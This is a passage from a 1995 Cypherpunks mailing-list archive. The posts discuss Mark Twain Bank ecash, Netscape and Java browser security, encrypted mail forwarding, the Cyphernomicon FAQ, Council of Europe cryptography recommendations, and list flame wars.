Too much jargon can swamp the audience and they will be distracted from
important
content while they try to remember what a particular word means.


>BTW, once we finish this and show it locally, we are considering
>doing some duplication to send out to interested bodies.  Do you
>think there is demand for a good, clear intro to all this in video
>form?
>

I'm sure there is a need for this sort of programme that is produced well and
is reasonably priced.  Remember to get signed releases from EVERYONE involved 
in the project, not just ppl on camera, so you can sell the programme
ANYWHERE IN 
THE WORLD if you choose to.

Don't be misled, I'm sure there are quite a few programmes out there on this
very topic.
Yours needs to be significantly different and entertaining.  I would suggest
you have an 
opportunity to make a video from 'the inside', given the ppl on this list
and the contacts 
they have.  A lot of films sre good introductions to a subject without
standing up and 
calling them such... like if I was making a video about Phil I would have to
explain crypto
and its use as a way of reaching a level of understanding for the audience.

Hope this is of some help.


>Thanks,
>-- 
>        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
>       gro.doowhcet at eebmoc | combee at techwood.org           (ENGINEERING) 
>\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)
>


Cheers

Peter

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKu5bOvjRao+WEx9AQHKhQQAhOGT7fecYsaiwCDa6d8Ka7J6Hsgwuw5D
tcknrSNVZGSf3+GCHWWVvCgsqHbgd+T9W/xFE9wlwzBmnbL9OwLb8sGr6yYDljL4
KH474GmKrax2hmu3h24J7HbsdTGDwj/KTrWnW4Kc+5TVIdhe0TM7SQBAMfWsYhuP
2YaxW3QYoTg=
=zt0k
-----END PGP SIGNATURE-----







                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship at gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10






From wilcoxb at nagina.cs.colorado.edu  Thu Nov 16 17:43:30 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Fri, 17 Nov 1995 09:43:30 +0800
Subject: Mark Twain Bank ecash scripts needed
Message-ID: <199511162325.QAA16375@nagina.cs.colorado.edu>



-----BEGIN PGP SIGNED MESSAGE-----

I am in the process of setting up a shop using Mark Twain Bank
Ecash.  Could someone please forward me the scripts to accept Ecash
(running on SunOS.  On c2.org actually) and/or any advice you have
about how to expeditiously implement a shop?  I am about to fax MTB
the agreement form, so I should get information from them "within 24
hours", but that is cutting it awfully close to the Friday deadline
for the US$300.00 fee waiver.


Many thanks!


Bryce

signatures follow

            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce at colorado.edu                   </a>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKvIGfWZSllhfG25AQElIQP+McHbg+ZCWMhSZ0YDDFwHE/TVhlAPrNX5
Oh2/8n3IirDb3KePXlvSdXAtCXS9ROuHSMqN9UQ0cPX9kOdgFMomwvsCqo9G5eZ0
Tan+9IW0WcvtntJ+8DFIN5jhlEbT5b+HRlKul1SkImezFM1kRDM4qqD1LD6srGRe
NEV32AZG1dU=
=A6lY
-----END PGP SIGNATURE-----





From Matthew.Sheppard at Comp.VUW.AC.NZ  Thu Nov 16 17:47:26 1995
From: Matthew.Sheppard at Comp.VUW.AC.NZ (Matthew James Sheppard)
Date: Fri, 17 Nov 1995 09:47:26 +0800
Subject: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <199511162130.KAA04423@paramount.comp.vuw.ac.nz>


The shadowy figure took form and announced "I am "Perry E. Metzger" and I say .
..
> Jeff Weinstein writes:
> > All of these security measures are implemented by Netscape in the
> > current release.  Specifically, Netscape Navigator 2.0beta2
> > includes all the applet security precautions detailed in the recent
> > comp.lang.java posting.  Netscape has been shipping the fixed
> > applet security model for over a month(since 2.0Beta1)...
> 
> I've got to note just one thing -- every Netscape 2.0beta2 I've used
> has been so full of bugs, and so prone to problems, that I have my
> wonders about what the security code looks like.

Well beta2 is heaps better than beta1, I can still crash beta2 with or
without java under win3, sgi, solaris and alpha but it has to be used
for a longer and few crashes are repeatable.  Plus lots of new gizmos,
the certificate authority interface (thanks Jeff).

I've got to note just one thing -- what about the Netscape LiveScript
language?  is it opening up the same security can of worms as java?  I
realise that it provides functionality specific to browsing only (no
network/files) but the potential for bugs when you add another
language must increase.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---





From awestrop at nyx10.cs.du.edu  Thu Nov 16 17:48:30 1995
From: awestrop at nyx10.cs.du.edu (Alan Westrope)
Date: Fri, 17 Nov 1995 09:48:30 +0800
Subject: Q: blind maildrop anyone?
In-Reply-To: <199511161409.JAA08809@polyphony.sw.stratus.com>
Message-ID: <KJ9qwo9g/gwI085yn@nyx10.cs.du.edu>


-----BEGIN PGP SIGNED MESSAGE-----

> What I'd like to do is: establish an email account, other than the one I'm
> posting from; preferably on some free email/homepage box, that would encrypt
> all cleartext email to hit that account for me at this account.  I have tried,
> unsuccessfully to establish this at c2, which offers this service.

> My question: has anyone done this successfully at c2, or another location, 
> and be willing to point me in the right direction to accomplish this.

You could telnet to nyx.cs.du.edu and set up an (optionally pseudonymous)
free account.  I've installed a perl script (posted to this list by George
Magiros) that automagically encrypts a user's incoming email by piping it
through pgp 2.6.2.  To use it, create a .forward file consisting of the line:

"| /nyx/user/bin/privacy <YourPGPKeyID>"

This is far less effective than Sameer's c2 system, but it's simple enough
for net.novices to use.  You can retrieve your encrypted email via telnet,
ftp, or an offline mail reader that has hooks for pgp and works with mail
packets created by uqwk, which is also installed here.


Alan Westrope                  <awestrop at nyx10.cs.du.edu>
__________/|-,                 <adwestro at ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvUFlRRFMq4NZY5AQG+fwP/ecBYX/0mwiLy6ouDqkWHiObT9MQjMLqz
wsOYx6GLPqhPxsIFaXFA/EqR7FqyPwJrZauFpiVQawIj4KKw4TLGMAkQ5uOMe8wx
kr9Zj9iK1mXZ3m6FML7jAJqky+blp7H+noQuX2IYPzbhVhjLUk0pPZqNp76JJrGa
kYjx/B/2xFI=
=NzcI
-----END PGP SIGNATURE-----





From awestrop at nyx10.cs.du.edu  Thu Nov 16 17:52:58 1995
From: awestrop at nyx10.cs.du.edu (Alan Westrope)
Date: Fri, 17 Nov 1995 09:52:58 +0800
Subject: Denver area meeting, SUNDAY, Nov. 19, 2 pm
Message-ID: <cS9qwo9g/42D085yn@nyx10.cs.du.edu>


-----BEGIN PGP SIGNED MESSAGE-----

Once again, we'll begin in the basement of the Tivoli, at downtown
Denver's Auraria Campus, and perhaps wander elsewhere.  Drop me a
note if you need directions or more info.

Alan Westrope                  <awestrop at nyx10.cs.du.edu>
__________/|-,                 <adwestro at ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvVWFRRFMq4NZY5AQGDngP/XVXubqwKaFIa+Exo75BYjyKADVZI33tX
tOugaQG8Swla6wyPiUOfdTUdF49ZRHnVbowGw3o33k+3dMlfiC/ng2JqGOAyS9NR
zVUzIrPROMEBLS69FuLmaYDO/38dG5Xoqfir44qXm50mcEtfCZO7ILbG4dVKGBEI
0FxI3tAPTDU=
=njUa
-----END PGP SIGNATURE-----





From cassiel at alpha.c2.org  Thu Nov 16 18:04:46 1995
From: cassiel at alpha.c2.org (Cassiel)
Date: Fri, 17 Nov 1995 10:04:46 +0800
Subject: The Great FAQ Hunt
Message-ID: <199511162319.PAA24869@infinity.c2.org>


Several fellow newbies have written me asking to share
the sources I received re: where to get the uncorrupted
Cypherpunk FAQ (Cyphernomicon).  You can get it uncompressed--
along with a lot of other cool stuff, like the Applied
Crypto book--at Pat Farrell's Web Site (thanks, Pat!)

http://www.isse.gmu.edu/~pfarrell/crypto.html

However, when I tried to summon up this 1.2 MB tome with 
Netscape, my computer choked.  Changing the cache settings
didn't seem to help, so I wound up downloading it via FTP
from

ftp.netcom.com /pub/tc/tcmay

where you can also get your hands on the shorter MFAQ (Most
Frequently Asked Questions).

Hope this helps.  I'm on an info-diet, Cypherpunk Lite, so if 
you want to respond to this message, please be sure to "cc"
me directly.

Cassiel





From sameer at c2.org  Thu Nov 16 18:12:46 1995
From: sameer at c2.org (sameer)
Date: Fri, 17 Nov 1995 10:12:46 +0800
Subject: e$: Come aaaannnndddd Get it!
In-Reply-To: <Pine.SUN.3.91.951115201837.2421C-100000@eskimo.com>
Message-ID: <199511162357.PAA28293@infinity.c2.org>


	Donations are also possible through the remailer interface
at http://www.c2.org/remail/by-www.phtml and
https://www.c2.org/remail/by-www.phtml

	Once you send a message you'll be prompted if you want to pay
for the service you just used.

> 
> Although Private Idaho will always remain free, to encourage Ecash use, 
> my Web page will support "donations."  The initial merchant list sounds 
> like it's going to be a subset of this list.  Time to go add the Mark 
> Twain links to the page.  This is going to be fun...
> 
> Joel McNamara
> joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key
> Thomas Jefferson used strong crypto, shouldn't you?
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From ses at tipper.oit.unc.edu  Thu Nov 16 18:23:54 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Fri, 17 Nov 1995 10:23:54 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511162113.QAA08492@universe.digex.net>
Message-ID: <Pine.SOL.3.91.951116161656.19526G-100000@chivalry>


On Thu, 16 Nov 1995, Scott Brickner wrote:
> 
> You'd need a program which not only *accepted* the additional parameter,
> but also *needed* the second parameter.  I confess I have some difficulty
> thinking of one.

It's not too hard to think of a compression scheme that needs extra 
information to be passed from client to server; the obvious example is 
some sort of dictionary compression with external dictionaries (can be 
very effective for short messages where LZW etc never get a chance to get 
going). 

Another, more likely case, is where the object could have been compressed 
by several schemes, and a scheme ID is needed to determine which 
alogorithm to use. 

The real issue would appear to be intent, though. If it's obvious that 
the real intention for the hook is to allow encryption to be added, 
the State department can jump on it. 





From rmartin at aw.sgi.com  Thu Nov 16 18:56:01 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Fri, 17 Nov 1995 10:56:01 +0800
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <9511162021.ZM15853@glacius.alias.com>



-----BEGIN PGP SIGNED MESSAGE-----


We see enough press releases around here that we can recognise pronouncements
from the mouth of a computer company and those from individuals who happen
to work for a company.

On Nov 16,  7:06pm, Dr. Frederick B. Cohen wrote:
> 	So your claim is that Unix is perfectly secure for networking,
> because without inetd, sendmail, ident daemon, HTTP daemons, syslogd,
> and all those other add-on software pieces, if your users act perfectly
> and nobody ever makes a mistake, you are safe from known attacks.

Nope. Claim is roughly along the lines of, unix is incredibly insecure
for networking, because of inetd, sendmail, ident, httpd ... but *if*
there's a bug in sendmail, the trouble is not with the poor sod who
put file access into the kernel, and definitely not with the person
who wrote pine--even though pine calls sendmail.

> [summary of rest: postscript bad]

As you finally concluded, the problem is the web browser. I concede that
a web browser is a security hole by its very nature in that it makes it
a lot easier for anyone to grab anything from anywhere. (This is also
why web browsers would be unpopular with censors, if censors thought they
could get anywhere by arguing against web browsers instead of sites.)

Since you've now stated that the web browser is wrong and evil and bad,
perhaps it's time you explained your fix for the web browser. The
millions of users, even if they *aren't* the problem, even if they *are*
blameless for blindly accepting anything anyone sends them, even if they
are faultless to ignore any notes on security or care which come with web
browsers--despite all of this--will still want something like a web browser.

Your argument seems to be running to "users are stupid", but it's the
developer's fault that users are stupid, and the developer should protect
the user in all cases from their own stupidity.

People shouldn't make web browsers, because web browsers, in untrained hands,
can damage computers.
People shouldn't make guns, because guns, in untrained hands, can damage
computers.

I would say that connectivity is risk, and that those who want connectivity
must weigh those risks. I think most people weigh the risks of Netscape
et al. and say, "the benefits offset the risks."

richard

[web browsers don't destroy hard drives, numbskulls with mice do]

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvjYx1gtCYLvIJ1AQEjawP/WQh2UW4zDJpwQvObG1FLBGWwXZx0tV9S
EnkUCRJfqQvaDUWRuyKdyjffYIiwthbCUPyblLcNtj608b1skyledUm7ZNGRsn3m
F+nJ8CNLU7MFhPIiknY5HvjiNE+LCgLibIZRg4LfGAJ2cEScDBOq5JFp8E/9NycX
xUSIVSCVP3g=
=1Q1b
-----END PGP SIGNATURE-----





From tcmay at got.net  Thu Nov 16 19:00:35 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 11:00:35 +0800
Subject: e$: Mandarins, Lifers, and Talents
Message-ID: <acd11f1c0102100498cb@[205.199.118.202]>



Lots of different issues here....

At 9:02 PM 11/16/95, Robert Hettinga wrote:

>Reputation... It has been ever thus, for those of you who've been around
>here since I showed up a year ago last April. I just can't seem to color
>inside the lines, as far as Dr. May is concerned.

Unfair, unfair! I don't plan to dig up old posts where I said good things
about Bob's posts, but I know I have. His style differs from mine, of
course, but I usually avoid critiquing mere styles.

On to some other points in Bob's post: (quoting me)

>>2. I wish Mark Twain Bank well, but the success of the kinds of digital
>>cash we hope to see will not likely hinge on the success of one particular
>>operations, such as MTB.
>
>Nope. But if people completely ignored the Wright Brothers, would Curtiss
>have entered the market? (An interesting example, as the Wrights sued
>Curtiss for patent enfringement and lost, I think.)

"Flight" is a very interesting example to consider. Flight happened for a
lot of reaons, including technological feasibility, relatively low entry
costs, willingness of customers to pay for faster travel, etc.

It really did not happen because of cheerleaders. This is a recurring
belief of mine, notably in my occasional interactions with the nanotech
community, as a few members of this list can attest to. The "Rah, Rah"s--no
pun intended--play a minor role in adoption of new products and
technologies.


>>I have more interesting things to do, personally, than to be a pioneer so I
>>can then have nothing to sell, and little to buy....when "interesting
>>markets" start to appear, I'll look at it again.
>
>This is a straw man, Tim. Actually, it's post hoc. "If we had some ham, we
>could have some ham and eggs, if we had some eggs." or, "If we lived here,
>we'd be home now." Feh. You can do better than that. I've seen you do it.

One argument I am never persuaded by is the hackerish "Feh." (Does anybody
but hackers use this strange word?)

In any case, I'm not interested in "doing better than that." My support for
Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
Money, or E-Purse, of Digibux, or whatever, well, I'm not a merchant. Just
as one could study flight, to use Bob's example, without operating a
passenger service or a flying school, so one can be interested in digital
cash without "opening an account."

>But, to answer your nonexistant point, yes, people *are* starting to sell
>things on the net. We know that the best way to do that in the long run is
...

Ah, but I never claimed otherwise (perhaps this is what you mean by "your
nonexistant point"). My point was only that digital cash will happen mostly
when it fills a need, or is accepted by customers, not by cheerleading and
by urging people on this list to be pioneers.

(And actually I have nothing against urging people to be pioneers. Or
cheerleading. It doesn't consume much list bandwidth and it may actually
help get someone started. Which is why I didn't call for an end to
cheerleading and pioneer-recruiting.)

The theories about mandarins, lifers, and talents I'll discuss at another
time, maybe. All I'll say is that I think it's too simple a categorization.
Maybe it's a Boston viewpoint. The folks I've worked with over the years
bear almost no resemblance to any of these categories. In any case, people
will start using digital cash if and when it fulfills some need, or some
need they never knew they had, gets stimulated.

On a personal note--which is weird, since 1000 or more people may be
reading this message, though most probably haven't read this far--I think
it best not to get too emotionally attached to some particular outcome in
the introduction of a new technology. Most product and technology successes
are essentially unpredictable, and many things thought to be sure things
are failures. I've seen many "prophets" wailing to the world that their
visions _deserve_ success.

The technologies which hit the right chord rarely need, or benefit from,
the "evangelists" and "cheerleaders." The Macintosh did not Guy Kawasaki or
any of the other so-called evangelists to succeed. The microprocessor did
not evangelists. The airplane did not. The VCR did not. The cellular phone
did not.

In fact, I can't think of an example of a major technology that _did_
depend critically on cheerleaders and evangelists. Some examples may exist,
but they seem to be rare. And I can think immediately of several
technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
enthusiasts--but in which progress has been stalled or proceeded along
different paths for different reasons.

This is a very interesting area for me, and I used to write extensively
about it. Nick Szabo and I had several debates about this, a couple of
years ago. However, no time now to discuss the full implications here.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Thu Nov 16 19:11:59 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 11:11:59 +0800
Subject: The Great FAQ Hunt
Message-ID: <acd12714020210047817@[205.199.118.202]>


I answer questions about my megabyte-long "Cyphernomicon" FAQ every few
months, so I guess it's that time again.

At 11:19 PM 11/16/95, Cassiel wrote:
>Several fellow newbies have written me asking to share
>the sources I received re: where to get the uncorrupted
>Cypherpunk FAQ (Cyphernomicon).  You can get it uncompressed--
>along with a lot of other cool stuff, like the Applied
>Crypto book--at Pat Farrell's Web Site (thanks, Pat!)
>
>http://www.isse.gmu.edu/~pfarrell/crypto.html
>
>However, when I tried to summon up this 1.2 MB tome with
>Netscape, my computer choked.  Changing the cache settings
>didn't seem to help, so I wound up downloading it via FTP
>from
>
>ftp.netcom.com /pub/tc/tcmay
>
>where you can also get your hands on the shorter MFAQ (Most
>Frequently Asked Questions).

My "Cyphernomicon" FAQ, and various shorter and compressed versions, are
available, actually, in several places.

The site I tell people about most often is Jonathan Rochkind's excellent
HTML version at the URL: http://www.oberlin.edu/~brchkind/cyphernomicon/

I recommend that people use their browsers to read it at this URL. To those
who want to download the whole thing and print it out, I have one question:
"Are you on drugs?" (I have gotten complaints from people who tried to
print it out and gave up after 200 pages, somehow blaming me for it being
too long. Use computerized search tools!)

Searching for "Cyphernomicon" with InfoSeek, Excite, Lycos, or other search
tools will show numerous places it may be found.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From cjs at netcom.com  Thu Nov 16 19:25:40 1995
From: cjs at netcom.com (cjs)
Date: Fri, 17 Nov 1995 11:25:40 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <199511170156.RAA17754@netcom20.netcom.com>


I keep telling you people.. if you keep giving Fred the attention, he
is never going to go away. Its blindingly obvious that he doesn't know
his ass from a hole in the ground, but if you keep telling him that,
its just going to encourage to post more, post more frequently, and
make a bigger fool of himself then he already has. Just ignore
everything he says. Make a proc-mail script to send his mails to
/dev/null or sends them through the text-to-hick filter. But whatever
you do, do *not* send him money, do *not* feed him, and *never* *ever*
no matter how much he begs, nt matter how much he pleads, *NEVER*
reply to this man's messages.

We need one of those little posters like the "Do not takes checks from
this man" ones in the grocery store.

Christopher

> > 3.  Postscript considered dangerous:   (insert-smiley) 
> > 
> > As for the question of someone invoking a postscript interpreter via a
> > browser and thus opening up their system to some rogue postscript
> > file: I think it would be great if either of these two things were to
> > magically happen:
> > 
> > 	1) people would stop putting postscript docs on web pages
> > 	because it's the wrong technology for WWW - it wastes
> > 	bandwidth - it's hard to view & hence often ugly - everyone
> > 	just prints it out anyway and then complains because there
> > 	is no one "standard" implementation of postscript printing
> > 	worldwide and there are dozens of minor problems
> > 
> > 	2) someone could implement a secure postscript previewer
> > 	(whatever that means!) 
> > 
> > I doubt either of those two things will happen.  The average Jo on the
> > internet needs to understand that when s/he downloads binary files
> > over the internet and run them from insecure programs on their local
> > computer, well, s/he runs some risk.  This risk might be tiny, but
> > it's impossible to quantify loss.  If I lose a poem that I'm writing,
> > to me that's priceless, so I do not intend to imply that loss of data
> > isn't tragic for the person who loses it.  If you have data you can't
> > bear to lose, be sure to practice safe computing.  Perform backups
> > regularly, and use judgement about which interpreters and executable
> > programs you allow to run on your PC.
> > 
> > Marianne
> 
> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscpe, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.
> 
> -- 
> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236







From rmartin at aw.sgi.com  Thu Nov 16 19:40:03 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Fri, 17 Nov 1995 11:40:03 +0800
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <9511161831.ZM14572@glacius.alias.com>



-----BEGIN PGP SIGNED MESSAGE-----

On Nov 16,  4:08pm, Dr. Frederick B. Cohen wrote:
> Subject: Re: Java & Netscape security (reply to misc. postings)
> > 3.  Postscript considered dangerous:   (insert-smiley)
> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscpe, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.

Alright. I've lurked on this one-man issue long enough. The latest attack
was severely lacking in clue. Had Dr. Fred bothered to read EVEN the
.sig file, he *might* have noticed that Marianne works for SUN [three
letters], not Netscape [eight letters].

He *might* have noticed that she was writing from her personal account.

Perhaps Dr. Fred fails to realise that some people *aren't* speaking
for their entire company every time they write e-mail. [see fc.all.net--
i always enjoy pronouncing that nearly phonetically]

Dr. Fred will forward this `official Netscape line' to Netscape,
probably with the similar lack of proper attribution or recognition
of context. We can hope that the receiving end of Netscape possesses at
least those few cluons more which are required realise how far off
*anything* Dr. Fred is now writing.

To have some slight cpunks relevance, I will weigh in on the side of
`It's not X's responsibility to ensure that Y's software isn't broken.'
{for all X, Y in {software developers}} Why? For the same reason that
I'm not generally held accountable for, say, Gary Jeffer's opinions
or Tim May's: because I don't have any control over them.

richard

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKvJkB1gtCYLvIJ1AQF0kwP9E1WZCflbNqGXBaOv1ipTiJdTHjB52aSy
YPhBmTBVKM/FsjekDY0nBmAOsZsj/ak/aUTnkUF5BayMv4dm9yBYb2uc6ow3molK
ijLKqbTnPJtNqQvr7VQZZqFvMwxaBxiyWvHp5ccVCIRXTJV/++YRPbx0dqJvnVMW
CytvDDJ2944=
=ZWg+
-----END PGP SIGNATURE-----





From rthomas at pamd.cig.mot.com  Thu Nov 16 19:40:55 1995
From: rthomas at pamd.cig.mot.com (Robert Owen Thomas)
Date: Fri, 17 Nov 1995 11:40:55 +0800
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <9511162017.ZM29217@pamd.cig.mot.com>


*sigh* yet another rambling non-sequitur from Dr. Fred.  time to re-activate
my kill-file...
--

o  Robert Owen Thomas:  Corvette pilot. Cymro ydw i. User scratching post.  o
o       E-mail: Robert.Thomas at pamd.cig.mot.com --or-- robt at Cymru.COM        o
o               Vox:  708.435.7076   Fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o





From weidai at eskimo.com  Thu Nov 16 19:47:12 1995
From: weidai at eskimo.com (Wei Dai)
Date: Fri, 17 Nov 1995 11:47:12 +0800
Subject: primality code
In-Reply-To: <9511161826.AA10763@asgaard.rocket.com>
Message-ID: <Pine.SUN.3.91.951116182725.4040C-100000@eskimo.com>


On Thu, 16 Nov 1995, Philip Nesser wrote:

> Can someone point me in the right direction for any archives of code to do
> primality testing?  I would rather not have to right something from
> scratch.

You may want to try my Crypto++, which includes, among other things, a 
bignum package and an implementation of the Rabin-Miller compositeness test.

See http://www.eskimo.com/~weidai/cryptlib.html for more information.

Wei Dai





From adam at lighthouse.homeport.org  Thu Nov 16 19:50:08 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Fri, 17 Nov 1995 11:50:08 +0800
Subject: MED_vac
In-Reply-To: <199511152004.PAA05104@ziggy.tis.com>
Message-ID: <199511170243.VAA06078@homeport.org>


	If you have some personal data that includes your patient
number, why not have a card that instead lists your important data?
"This patient is diabetic, alergic to amoxicillin, and has Gold Cross
insurance." 

	The amount of important data that an ER needs is small.  There
is small benefit to building a huge infrastructure to get that data
carted around.  Also, in ERs, the computers are often authorized the
same way everything else is: a nurse will tell you to leave if you
don't belong there.

	At Defcon, Bruce Schneier was talking about the value stored
in casino chips.  Its sttaggering.  Its an alternate cash system, with
a huge float, astounding velocity, and very little fraud.  Transaction
costs are low, clearing is instantaneous.  The comparison is fairly
clear.

Adam

Thomas M. Swiss wrote:

|      I very much want hospitals to have fast access to my medical data if
| my broken and bleeding body should come through their door, even if I am
| unconscious and my personal physician cannot be reached. On the other hand,
| I don't want anyone to be snooping through them right now.

|      So, what if my records were available on the net, but encrypted with a
| an key known to my physician and an escrow agency? (Equivalently, they
| could be on that smartcard, but encrypted.) If an emergency occurs, the
| hospital fetches my encrypted records from my physician's server, then
| sends a message (signed with the hospital's key) to Keys R Us, the escrow
| agent, saying "This is Dr. McCoy at Frobnitz Memorial Hospital, we need the
| key for FooBar Medix, Inc., patient number 147258369." (My FooBar Medix,
| Inc., insurance card lists my physician's server, the escrow agency, and my



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From asgaard at sos.sll.se  Thu Nov 16 20:00:45 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Fri, 17 Nov 1995 12:00:45 +0800
Subject: COE Recommendation No. R (95) 13
In-Reply-To: <9511160302.AA17272@www18.w3.org>
Message-ID: <Pine.HPP.3.91.951117024147.26779A-100000@cor.sos.sll.se>


On Wed, 15 Nov 1995, Phillip M. Hallam-Baker wrote:

> I think the majority of the text is well thought out and very much in
> line with what we would want.

How about this:
________________________________________________________________________
9. Subject to legal privileges or protection, most legal systems permit
investigating authorities to order persons to hand over objects under
their control that are required to serve as evidence. In a parallel
fashion, provisions should be made for the power to order persons to
submit any specified data under their control in a computer system in the
form required by the investigating authority.
________________________________________________________________________

Is this 'what we would want'? It clearly means that one can be ordered
to reveal the password to encrypted data and punished by law if one
refuses. Suppose they suspect you of being a child pornographer and
get a court order to search your encrypted system. You know you are
innocent. Is it acceptable to put you in jail for not giving them access
to your encrypted, very personal diary (in which you describe in detail
your sexual encounters with the wife of the Chief of Police)?

And how about this: 
_______________________________________________________________________
14. Measures should be considered to minimise the negative effects of the
use of cryptography on the investigation of criminal offenses, without
affecting its legitimate use more than is strictly necessary.
_______________________________________________________________________

Is this really just a toothless statement to give to the French?
Couldn't it as easily be interpreted as not wanting to go into
details yet (since no real system is available) but stating that
some form of GAK is on the agenda? Surely, law enforcement
bureaucrats would not consider GAK to affect the 'legitimate
use' of cryptography 'more than is strictly necessary'.

Mats









From sameer at c2.org  Thu Nov 16 20:02:42 1995
From: sameer at c2.org (sameer)
Date: Fri, 17 Nov 1995 12:02:42 +0800
Subject: e$: Come aaaannnndddd Get it!
In-Reply-To: <01HXORFUEO5Y8WY0P1@mbcl.rutgers.edu>
Message-ID: <199511162356.PAA28194@infinity.c2.org>


> 	I will as soon as someone comes up with a _fully_ private digital
> cash system and starts using it for something. As I understand it, Chaum's
> ecash system is not one (i.e., non-privacy to the sender and of amounts to the
> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
> immediately (if there's a text-based interface).

	ecash provides full payor anonymity. Payee anonymity is
currently not possible, but that is being worked on. 

	If you used ecash to pay for a c2.org account, neither I nor
the bank would be able to trace the payment into the c2.org account to
an actual account at mark twain bank.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From schampeo at imonics.com  Thu Nov 16 20:14:24 1995
From: schampeo at imonics.com (Steve Champeon working from home)
Date: Fri, 17 Nov 1995 12:14:24 +0800
Subject: Java & Netscape security  [NOISE]
Message-ID: <v02120d00acd1aa2c9cf1@[205.139.212.66]>


<plonk>! I'm so tired of listening to this no-researching,
no-paying-attention, out-to-make-money freak I just can't
stand it. Consider Mr. fc at all.net hereby removed from my
mailbox by virtue of the autofiltering capability of my
lovely mailreader.

Fred: *RTFWP* and stop complaining about things you know
nothing about. Feh.


Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo at imonics.com
Imonics Web Services                    webmaster at imonics.com









From szabo at netcom.com  Thu Nov 16 20:51:37 1995
